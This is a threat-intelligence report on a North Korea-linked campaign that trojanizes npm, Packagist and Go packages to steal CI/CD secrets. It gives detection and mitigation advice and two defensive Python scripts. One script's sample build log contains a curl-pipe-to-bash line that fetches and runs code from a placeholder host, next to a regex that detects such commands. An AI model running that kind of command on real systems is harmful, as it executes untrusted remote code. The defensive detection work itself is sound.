North Korea's 'PolinRider' Supply Chain Campaign Expands with 108 New Malicious Packages

North Korean Hackers Escalate 'PolinRider' Supply Chain Attack on Devs

HIGH
July 4, 2026
Supply Chain Attack, Threat Actor, Cloud Security

Related Entities

Threat Actors: Contagious Interview, Famous Chollima

Organizations: Socket

Products & Tech: npm, Packagist, Go, Kubernetes

Full Report

Executive Summary

North Korea-aligned threat actors, tracked as Contagious Interview (or Famous Chollima), are significantly expanding a sophisticated software supply chain campaign known as PolinRider. According to security firm Socket, the group has published 108 unique malicious packages and browser extensions across the npm, Packagist (PHP), and Go open-source ecosystems. The campaign's objective is to compromise developer accounts and infiltrate enterprise CI/CD pipelines to steal credentials and propagate further attacks. This escalation highlights the persistent and evolving threat that state-sponsored actors pose to the integrity of the open-source software supply chain.

Threat Overview

The PolinRider campaign is a multi-stage supply chain attack targeting software developers.

  • Threat Actor: Attributed to the North Korean group "Contagious Interview" / "Famous Chollima."
  • Initial Access: The group uses social engineering, often with fake job offers, to compromise the accounts of legitimate open-source package maintainers.
  • Tactic: Once they have control of a maintainer's account, they inject malicious code into new versions of popular packages. Unsuspecting developers then pull these trojanized updates into their own projects.
  • Affected Repositories: The campaign has targeted multiple ecosystems, including npm (JavaScript), Packagist (PHP), and Go modules, as well as at least one Chrome extension.
  • Payload: The malicious code is designed to activate within the developer's environment or, more critically, within an organization's CI/CD pipeline. Its primary function is to steal sensitive credentials, such as Kubernetes access tokens, API keys, and other secrets.

Technical Analysis

This campaign is a classic example of exploiting trust in the open-source ecosystem.

Impact Assessment

The PolinRider campaign poses a severe threat to organizations that rely on open-source software.

  • Widespread Compromise: A single compromised package can lead to the breach of hundreds or thousands of downstream projects and companies.
  • High-Privilege Access: CI/CD pipelines often have high-level privileges and access to production secrets. A compromise here can lead to a full takeover of cloud infrastructure.
  • Stealth and Persistence: Attacks originating from a trusted, internal build process are extremely difficult to detect.
  • Brand Damage: An organization whose software is found to contain malicious code from a supply chain attack will suffer immense reputational damage.

IOCs — Directly from Articles

No specific package names, domains, or other IOCs were provided in the source articles.

Cyber Observables — Hunting Hints

Detecting this activity requires vigilance over the software development lifecycle. The following patterns could indicate related activity:

  • Log Source (CI/CD build logs): Look for build steps that make unexpected outbound network connections, especially from package installation scripts.
  • File Path (package.json, composer.json, go.mod): Monitor for dependencies being updated to new versions that have been published very recently or by an unfamiliar maintainer.
  • Command Line Pattern (`curl | bash`)
  • Network Traffic Pattern (DNS queries to suspicious domains from build agents): Monitor for connections to domains that are not known package registries or code repositories.
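The build-log, command-line and network hints above can be turned into one pass over CI output. The following is an added example (not from the article or Socket's research): the log lines are constructed, `ALLOWED_HOSTS` is an assumed per-organisation allowlist of package registries, and `hunt_build_log` flags pipe-to-shell install steps and any host contacted outside that allowlist.

```python
import re

# Constructed sample CI build-log lines in the style of an npm install step.
# Illustrative only; not taken from the campaign or from Socket's report.
SAMPLE_BUILD_LOG = """\
[12:01:03] npm install
[12:01:04] GET https://registry.npmjs.org/left-pad -> 200
[12:01:05] > example-pkg@1.4.2 postinstall
[12:01:05] > curl -s https://cdn.example-update.net/setup.sh | bash
[12:01:06] CONNECT dl.example-update.net:443
[12:01:07] GET https://proxy.golang.org/github.com/foo/bar/@v/list -> 200
[12:01:08] DNS query: metrics.unknown-host.xyz
"""

# Hosts a build job legitimately talks to (assumption: tune this per organisation).
ALLOWED_HOSTS = {"registry.npmjs.org", "repo.packagist.org", "proxy.golang.org",
                 "sum.golang.org", "github.com"}

# Anything fetched with curl/wget and piped straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")
# Ways a host name shows up in the sample log: URLs, proxy CONNECTs, DNS lookups.
HOST_PATTERNS = [
    re.compile(r"https?://([A-Za-z0-9.-]+)"),
    re.compile(r"\bCONNECT\s+([A-Za-z0-9.-]+):\d+"),
    re.compile(r"\bDNS query:\s+([A-Za-z0-9.-]+)"),
]

def hunt_build_log(log_text, allowed_hosts=ALLOWED_HOSTS):
    """Return (line_no, reason, line) findings for pipe-to-shell install steps
    and for contacts with hosts outside the registry allowlist."""
    findings = []
    for no, line in enumerate(log_text.splitlines(), 1):
        if PIPE_TO_SHELL.search(line):
            findings.append((no, "pipe-to-shell", line))
        for pattern in HOST_PATTERNS:
            for host in pattern.findall(line):
                if host.lower() not in allowed_hosts:
                    findings.append((no, f"unexpected-host:{host}", line))
    return findings

if __name__ == "__main__":
    for no, reason, line in hunt_build_log(SAMPLE_BUILD_LOG):
        print(f"line {no}: {reason}: {line}")
```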

Detection & Response

  1. Dependency Scanning: Use advanced software composition analysis (SCA) tools that perform behavioral analysis on packages during installation in a sandbox to detect malicious activity (e.g., network connections, file system access). This is a form of D3FEND's Dynamic Analysis (D3-DA).
  2. CI/CD Monitoring: Monitor the behavior of your build runners. Alert on anomalous network connections, process executions, and file access patterns.
  3. Code Provenance: Use tools and services that verify the provenance of open-source packages, such as checking for changes in maintainer accounts or unusual publishing patterns.

Mitigation

  1. Vet Dependencies: Do not blindly trust open-source packages. Pin dependencies to specific, known-good versions. Before updating, review the changes and the reputation of the contributor. This is a form of Executable Allowlisting (D3-EAL).
  2. Least-Privilege CI/CD: Ensure that build jobs run with the minimum necessary permissions. Use ephemeral, short-lived credentials for each build instead of long-lived secrets.
  3. Network Egress Filtering: Tightly restrict outbound network access from your CI/CD environment. Only allow connections to known, trusted repositories. This is a crucial Outbound Traffic Filtering (D3-OTF) control.
  4. Maintainer Account Security: For those who maintain open-source packages, enforce MFA on all accounts (GitHub, npm, etc.) and be vigilant for social engineering attempts. This is a direct application of Multi-factor Authentication (M1032).
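The manifest-file hunting hint and mitigation step 1 (pin dependencies, review the contributor before updating) can be scripted as a pre-update check. This is an added example, not the article's or Socket's tooling: `MANIFEST` and `REGISTRY` are constructed sample data, the maintainer and package names are fictitious, and `vet_dependencies` assumes the registry metadata has already been fetched into that shape.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample manifest (package.json style) and registry metadata.
# Illustrative only; none of these packages or maintainers are from the report.
MANIFEST = {"dependencies": {"fast-utils": "^2.3.0", "tiny-log": "1.0.4", "web-kit": "latest"}}
NOW = datetime(2026, 7, 4, tzinfo=timezone.utc)
# Per package: publish time and maintainer set for each version.
# Assumption: a real check would pull this from the registry's package metadata.
REGISTRY = {
    "fast-utils": {
        "2.3.0": {"published": NOW - timedelta(days=400), "maintainers": {"alice"}},
        "2.3.1": {"published": NOW - timedelta(days=2), "maintainers": {"alice", "new-acct-77"}},
    },
    "tiny-log": {"1.0.4": {"published": NOW - timedelta(days=90), "maintainers": {"bob"}}},
    "web-kit": {"5.0.0": {"published": NOW - timedelta(days=1), "maintainers": {"carol"}}},
}

def latest_version(versions):
    # Highest version by numeric components; enough for the dotted versions used here.
    return max(versions, key=lambda v: tuple(int(p) for p in v.split(".")))

def vet_dependencies(manifest, registry, now=NOW, max_age_days=7):
    """Flag dependencies that are unpinned, that resolve to a version published
    within max_age_days, or whose maintainer set changed since the base version.
    Simplification: an unpinned spec is assumed to resolve to the newest version."""
    findings = {}
    for name, spec in manifest["dependencies"].items():
        reasons, versions = [], registry[name]
        pinned = spec[0].isdigit()
        if pinned:
            base = spec                      # exact version: resolves to itself
        elif spec[0] in "^~":
            base = spec[1:]                  # range: compare against its floor
        else:
            base = None                      # "latest", "*", tags: no base to compare
        if not pinned:
            reasons.append(f"unpinned spec {spec!r}")
        resolved = base if pinned else latest_version(versions)
        meta = versions[resolved]
        age = (now - meta["published"]).days
        if age < max_age_days:
            reasons.append(f"{resolved} published {age}d ago")
        if base in versions and versions[base]["maintainers"] != meta["maintainers"]:
            added = meta["maintainers"] - versions[base]["maintainers"]
            reasons.append(f"maintainers changed since {base}: +{sorted(added)}")
        if reasons:
            findings[name] = reasons
    return findings
```

A dependency with an empty finding list (here `tiny-log`) is pinned, mature and unchanged in ownership; anything else should be reviewed before the lockfile is updated.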

Timeline of Events

  1. July 4, 2026: This article was published.

MITRE ATT&CK Mitigations

Enforcing MFA on developer accounts for package registries and version control systems is critical to prevent account takeover.

Strict egress filtering on CI/CD runners can block the exfiltration of stolen credentials.

Audit (M1047, enterprise)

Auditing and analyzing dependencies before ingestion can help identify malicious or suspicious packages.

Article Author

Jason Gomes, Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

Supply Chain Attack, North Korea, PolinRider, Contagious Interview, npm, Packagist, Go, CI/CD
